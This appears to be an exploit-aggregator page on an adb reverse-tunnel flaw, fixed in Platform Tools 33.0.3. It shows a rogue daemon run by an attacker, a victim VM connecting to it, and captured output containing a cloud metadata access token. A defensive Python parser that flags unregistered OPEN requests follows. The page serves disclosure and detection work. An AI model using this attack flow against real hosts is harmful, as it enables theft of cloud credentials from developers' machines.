## https://sploitus.com/exploit?id=195A678A-E958-5D72-842A-ABE99D4F4375
The reverse tunnel feature in Android Debug Bridge (adb) was vulnerable: it allowed a malicious adb daemon to open connections to arbitrary hosts and ports, and to Unix domain sockets, on the host running the adb client.


Attacker window (where the rogue daemon is running):

```
$ ./adb_rogue_daemon.py
```

Victim window (a GCE VM in this example):

```
$ adb connect serverip:5556
connected to 8.tcp.ngrok.io:19076
```

Attacker window:

```
...
Wooho, we got response for our rouge request!
b'HTTP/1.0 200 OK\r\nMetadata-Flavor: Google\r\nContent-Type: application/json\r\nDate: Thu, 04 Nov 2021 22:31:21 GMT\r\nServer: Metadata Server for VM\r\nConnection: Close\r\nContent-Length: 1049\r\nX-XSS-Protection: 0\r\nX-Frame-Options: SAMEORIGIN\r\n\r\n{"access_token":"ya29.c.KpgBFghLV[redacted].....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................'
<<< b'...................................................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba'
b'...................................................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba'
('....', (774778414, 774778414, 774778414, 774778414, 774778414), b'...........................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba')
```


This was fixed in Platform Tools 33.0.3.
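
As an added example (not part of the original write-up and not adb's own code), the following parses adb wire messages and lists daemon-initiated `OPEN` destinations that no user-configured reverse forward covers. Accepting only registered destinations is an assumption made for illustration; `unexpected_opens`, `REGISTERED` and the sample traffic are constructed, and only the `CLSE` bytes are taken from the capture above.

```python
import struct

# adb message header: six little-endian uint32 fields
# (command, arg0, arg1, data_length, data_check, magic); magic == command ^ 0xFFFFFFFF.
HEADER = struct.Struct("<6I")

def parse_messages(stream: bytes):
    """Yield (command, arg0, arg1, payload) for each complete message in stream."""
    offset = 0
    while offset + HEADER.size <= len(stream):
        cmd, arg0, arg1, length, _check, magic = HEADER.unpack_from(stream, offset)
        if magic != cmd ^ 0xFFFFFFFF:
            raise ValueError(f"bad magic at offset {offset}")
        start = offset + HEADER.size
        if start + length > len(stream):
            break  # payload truncated; stop rather than guess
        yield cmd.to_bytes(4, "little"), arg0, arg1, stream[start:start + length]
        offset = start + length

def unexpected_opens(daemon_to_host: bytes, registered: set) -> list:
    """Destinations the daemon asked the host to open that no reverse forward covers."""
    flagged = []
    for cmd, _local_id, _zero, payload in parse_messages(daemon_to_host):
        if cmd == b"OPEN":
            dest = payload.rstrip(b"\x00").decode("utf-8", "replace")
            if dest not in registered:
                flagged.append(dest)
    return flagged

def pack(cmd: bytes, arg0: int, arg1: int, payload: bytes = b"") -> bytes:
    """Build one message for the constructed sample (data_check left 0, not verified here)."""
    c = int.from_bytes(cmd, "little")
    return HEADER.pack(c, arg0, arg1, len(payload), 0, c ^ 0xFFFFFFFF) + payload

# The CLSE message that ends the capture shown on this page.
PAGE_CLSE = b"CLSE\x08\x00\x00\x00\xd2\x04" + b"\x00" * 10 + b"\xbc\xb3\xac\xba"

# Constructed sample: daemon-to-host traffic where the user only set up tcp:8081.
REGISTERED = {"tcp:8081"}
SAMPLE = (
    pack(b"OPEN", 7, 0, b"tcp:8081\x00")
    + pack(b"OPEN", 8, 0, b"tcp:internal.example:80\x00")
    + pack(b"OPEN", 9, 0, b"localfilesystem:/run/example.sock\x00")
)

if __name__ == "__main__":
    print(list(parse_messages(PAGE_CLSE)))
    for dest in unexpected_opens(SAMPLE, REGISTERED):
        print("unregistered destination requested by daemon:", dest)
```
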